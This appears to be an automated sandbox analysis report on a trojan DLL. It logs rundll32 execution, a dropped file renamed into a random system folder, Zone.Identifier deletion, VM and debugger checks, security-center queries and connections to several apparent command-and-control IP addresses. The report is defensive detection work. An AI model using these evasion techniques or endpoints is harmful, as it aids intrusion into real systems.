Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10010B8A	0_2_10010B8A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10004D90	0_2_10004D90
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10013590	0_2_10013590
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1001C192	0_2_1001C192
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000BB96	0_2_1000BB96
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10012FA1	0_2_10012FA1
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_100193AA	0_2_100193AA
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10003FAF	0_2_10003FAF
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000ADAF	0_2_1000ADAF
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_100147B5	0_2_100147B5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_100109B8	0_2_100109B8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000F9BA	0_2_1000F9BA
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000FFBA	0_2_1000FFBA
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10019DBF	0_2_10019DBF
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10017BBE	0_2_10017BBE
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1001DBC4	0_2_1001DBC4
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_100057D4	0_2_100057D4
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10002DDF	0_2_10002DDF
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000F5E0	0_2_1000F5E0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10016BE4	0_2_10016BE4
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1001CBE7	0_2_1001CBE7
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_100067EF	0_2_100067EF
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1001BBF1	0_2_1001BBF1
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_100035FC	0_2_100035FC
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10007FFE	0_2_10007FFE
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10011DFE	0_2_10011DFE

Source: C:\Windows\System32\svchost.exe	Section loaded: xboxlivetitleid.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cdpsgshims.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: windowscoredeviceinfo.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: windowscoredeviceinfo.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: windowscoredeviceinfo.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: windowscoredeviceinfo.dll	Jump to behavior

Source: sample.dll	Virustotal: Detection: 80%
Source: sample.dll	Metadefender: Detection: 70%
Source: sample.dll	ReversingLabs: Detection: 85%

Source: sample.dll

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\sample.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\sample.dll",#1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\sample.dll",#1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ttwabgporcdt\yyxjoravwnz.pba",iNIZBi
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5836 -s 344
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown	Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Ttwabgporcdt\yyxjoravwnz.pba",#1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\sample.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\sample.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ttwabgporcdt\yyxjoravwnz.pba",iNIZBi	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Ttwabgporcdt\yyxjoravwnz.pba",#1	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER922F.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winDLL@26/27@0/11

Source: C:\Windows\SysWOW64\rundll32.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\sample.dll",#1

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5836
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:1464:120:WilError_01

Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source:

Binary string: WaaSMedicSvc.pdb source: waasmedic.20220801_204255_503.etl.15.dr

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000100B push ss; iretd	0_2_1000100C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_008CEED0 push edx; ret	2_2_008CEFD4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_008B3868 push ebp; ret	2_2_008B3878
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_008B13BB push ss; iretd	2_2_008B13C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_008B53F7 push 00000072h; retf	2_2_008B53FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_008B134B push 68244072h; iretd	2_2_008B1350
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_008B146C pushad ; iretd	2_2_008B146D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00D5EED0 push edx; ret	16_2_00D5EFD4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00D43868 push ebp; ret	16_2_00D43878
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00D453F7 push 00000072h; retf	16_2_00D453FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00D413BB push ss; iretd	16_2_00D413C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00D4134B push 68244072h; iretd	16_2_00D41350
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00D4146C pushad ; iretd	16_2_00D4146D

Source: sample.dll	Static PE information: section name: .text4
Source: sample.dll	Static PE information: section name: .text8
Source: sample.dll	Static PE information: section name: .text7
Source: sample.dll	Static PE information: section name: .text6
Source: sample.dll	Static PE information: section name: .text5

Source: sample.dll

Static PE information: real checksum: 0x605d1 should be: 0x5c59f

Source: C:\Windows\SysWOW64\rundll32.exe

PE file moved: C:\Windows\SysWOW64\Ttwabgporcdt\yyxjoravwnz.pba

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\SysWOW64\rundll32.exe

File opened: C:\Windows\SysWOW64\Ttwabgporcdt\yyxjoravwnz.pba:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Windows\System32\svchost.exe

System information queried: FirmwareTableInformation

Jump to behavior

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Windows\System32\svchost.exe TID: 2192	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4588	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5940	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4880	Thread sleep time: -60000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

API coverage: 0.0 %

Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem

Source: C:\Windows\SysWOW64\rundll32.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: svchost.exe, 0000001D.00000002.633610730.000001B27D6DC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWW
Source: svchost.exe, 0000000D.00000002.769088311.00000295437E2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`B
Source: svchost.exe, 0000000D.00000002.770670389.0000029544298000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: H=17&L=en-US&P=&PT=0x30&WUA=10.0.17134.1&MK=VMware%2C+Inc.&MD=VMware7%2C1
Source: svchost.exe, 0000000D.00000002.768772440.0000029543790000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
Source: DataStore.edb.13.dr	Binary or memory string: /SLS/{855E8A7C-ECB4-4CA3-B045-1DFA50104289}/x64/10.0.17134.1/0?CH=17&L=en-US&P=&PT=0x30&WUA=10.0.17134.1&MK=VMware%2C+Inc.&MD=VMware7%2C1
Source: svchost.exe, 00000005.00000002.678223626.000001EE1C466000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @Hyper-V RAW
Source: svchost.exe, 0000000D.00000002.769868932.0000029543996000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @Hyper-V RAWen-USn
Source: svchost.exe, 0000000D.00000002.771086416.00000295489C0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 34.1&MK=VMware%2C+Inc.&MD=VMware7%2C1
Source: svchost.exe, 0000000D.00000002.768772440.0000029543790000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware7,1
Source: svchost.exe, 00000003.00000002.766520789.00000196DDA02000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: svchost.exe, 00000005.00000002.678197048.000001EE1C45A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.769702405.0000029543963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.633643169.000001B27D6EC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000005.00000002.677583393.000001EE16E29000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW}F
Source: DataStore.edb.13.dr	Binary or memory string: /SLS/{9482F4B4-E343-43B6-B170-9A65BC822C77}/x64/10.0.17134.1/0?CH=17&L=en-US&P=&PT=0x30&WUA=10.0.17134.1&MK=VMware%2C+Inc.&MD=VMware7%2C1
Source: DataStore.edb.13.dr	Binary or memory string: /SLS/{8B24B027-1DEE-BABB-9A95-3517DFB9C552}/x64/10.0.17134.1/0?CH=17&L=en-US&P=&PT=0x30&WUA=10.0.17134.1&MK=VMware%2C+Inc.&MD=VMware7%2C1
Source: svchost.exe, 00000003.00000002.766922630.00000196DDA56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.766941806.000002984023E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.766800905.0000014A1D429000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 0000000D.00000002.771046675.0000029548960000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: /10.0.17134.1/0?CH=17&L=en-US&P=&PT=0x30&WUA=10.0.17134.1&MK=VMware%2C+Inc.&MD=VMware7%2C1
Source: svchost.exe, 0000001D.00000003.619559873.000001B27D6B5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.633554534.000001B27D6B6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`zn}

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_10003278 mov eax, dword ptr fs:[00000030h]

0_2_10003278

Source: C:\Windows\System32\loaddll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_1000E612 LdrInitializeThunk,

0_2_1000E612

Source: C:\Windows\System32\loaddll32.exe

Memory protected: page execute read | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 116.202.10.123 8080	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 203.157.152.9 7080	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 91.93.3.85 8080	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 172.96.190.154 8080	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 109.99.146.210 8080	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 190.107.118.125 80	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 163.53.204.180 443	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 157.245.145.87 443	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 190.55.186.229 80	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\sample.dll",#1

Jump to behavior

Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\SoftwareDistribution\DataStore\DataStore.edb VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\SoftwareDistribution\DataStore\DataStore.edb VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\SoftwareDistribution\DataStore\DataStore.edb VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\SoftwareDistribution\DataStore\DataStore.edb VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\SoftwareDistribution\DataStore\DataStore.edb VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\SoftwareDistribution\DataStore\DataStore.edb VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\SoftwareDistribution\DataStore\DataStore.edb VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Changes security center settings (notifications, updates, antivirus, firewall)

Source: C:\Windows\System32\svchost.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval

Jump to behavior

Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

Source: svchost.exe, 0000000D.00000002.768652843.0000029543754000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \BullGuard Ltd\BullGuard\BullGuard.exe
